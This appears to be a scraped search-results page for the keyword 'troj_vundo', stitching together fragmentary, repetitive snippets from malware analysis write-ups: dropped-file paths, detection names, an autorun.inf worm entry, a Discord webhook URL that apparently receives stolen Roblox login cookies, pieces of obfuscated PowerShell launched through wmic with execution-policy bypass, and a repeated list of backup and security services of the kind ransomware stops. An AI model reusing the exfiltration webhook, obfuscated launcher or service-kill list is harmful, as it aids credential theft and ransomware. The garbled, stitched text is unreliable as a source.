Keyword: troj_vundo
https://discordapp.com/api/webhooks/292933102060437504/6dkH6MUyHmo9IZ0ImsKH7Z-Xo7CdG_EGTQGfj8RDzJPgkyIA5FTUWKZCf6gSO9UqagzN --> NOTES: The message sent to discord is in the following format: _|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_{random hex
Description Name: VUNDO - HTTP (Request). This is Trend Micro detection for packets passing through HTTP network protocols that can be used as N/A. This also indicates a malware infection. Below are some indicators of an infected host: Excessive spam...
\DD_VCR~2.TXT %User Temp%\DD_VCR~4.TXT %User Temp%\DD_VCR~1.TXT %User Temp%\DD_VCR~3.TXT %User Temp%\PERFLI~1.DAT %User Temp%\PERFLI~2.DAT %User Temp%\_$Df\DF6Wks.sib (Note: %System% is the Windows system folder,
[Io.coMPRESsiOn.COmpReSsiONmode]::DEcOmpReSs )| %{NeW-OBJect iO.stREAmReaDEr( `$_ "\" + ([ChAR]44).ToString() + "\"[TExT.ENcodING]::ASCiI)} ).ReadtoEND( ) "\")" wmic PRoCEss 'call' "CReatE" "pOWERSHElL -eP BypaSS -NONinTER
it usually is C:\Windows on all Windows operating system versions.) It drops the following files: {removable and network drive letter}:\.lnk -> shortcut to {removable and network drive letter}:\_
{removable or network drive}:\_ %Windows%\M-5050480268465846240752862405642857248045 %User Temp%\ns{5-random characters}.tmp (Note: %Windows% is the Windows folder, where it usually is C:\Windows on all
]:Trojan-PSW.PHP.AccPhish.eu, [$_EVENTS]:Trojan-PSW.PHP.AccPhish.v, [$_ (Kaspersky); Trojan.Win32.Generic.pak!cobra (Sunbelt)
unknowingly by users when visiting malicious sites. Installation This Worm drops the following files: {Removable Drive}:\_\autorun.inf -> contains the following strings "[AUtoRuN]",LF,"ShEllExECUte=__
{removable or network drive}:\_ %Windows%\M-505038403028403028485929287348745929273958292048430 %User Temp%\ns{5-random characters}.tmp (Note: %Windows% is the Windows folder, where it usually is C:\Windows on
);Sl$$%-SSl$$%*SAdd-Type -TypeDefinition $v8e4462;Sl$$%-SSl$$%*S[pfb241]::re32e();Sl$$%-SSl$$%*SSl$$%-SSl$$%*SSl$$%-SSl$$%*_ Dropping Routine This Trojan drops the following files: {malware file path and
rtvscan qbfcservice qbidpservice intuit.quickbooks.fcs qbcfmonitorservice yoobackup yooit zhudongfangyu stc_raw_agent vsnapvss veeamtransportsvc veeamdeploymentservice veeamnfssvc pdvfsservice
gxvss gxblr gxfwd gxcvd gxcimgr defwatch ccevtmgr ccsetmgr savroam rtvscan qbfcservice qbidpservice intuit.quickbooks.fcs qbcfmonitorservice yoobackup yooit zhudongfangyu stc_raw_agent vsnapvss
files: %User Temp%\DD_VCR~2.TXT %User Temp%\DD_VCR~4.TXT %User Temp%\DD_VCR~1.TXT %User Temp%\DD_VCR~3.TXT %User Temp%\PERFLI~1.DAT %User Temp%\PERFLI~2.DAT %User Temp%\_$Df\DF6Wks.sib (Note: %User Temp%
is generated via an automated analysis system. Trojan:Win32/PossibleMalware.A, Trojan:Win32/PossibleMalware.A, Trojan:Win32/PossibleMalware.A, Troj (Microsoft); Backdoor.Trojan (Symantec);
creates the following folders: ()*+,-./0123456789:;=?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSÿì_CHAR(0x17)__CHAR(0x01)_XYZ{}~€‚ƒêԐG®_CHAR(0x19)__CHAR(0x01)_ÿÿÿÿ˜ü_CHAR(0x12)_ %User Profile%
intuit.quickbooks.fcs qbcfmonitorservice yoobackup yooit zhudongfangyu stc_raw_agent vsnapvss veeamtransportsvc veeamdeploymentservice veeamnfssvc pdvfsservice backupexecvssprovider backupexecagentaccelerator
following files: __tmp_rar_sfx_access_check_121156 %User Temp%\RarSFX0\_CHAR(0x04)_ _ PBArVzWJrYnjUO (Note: %User Temp% is the user's temporary folder, where it usually is C:\Documents and Settings\{user name
following files: __tmp_rar_sfx_access_check_361843 %User Temp%\RarSFX0\_CHAR(0x04)_ _ BSGxBArVzWJrYn (Note: %User Temp% is the user's temporary folder, where it usually is C:\Documents and Settings\{user name
following files: __tmp_rar_sfx_access_check_76640 %User Temp%\RarSFX0\_CHAR(0x04)_ _ YSGxBArVzWJr (Note: %User Temp% is the user's temporary folder, where it usually is C:\Documents and Settings\{user name}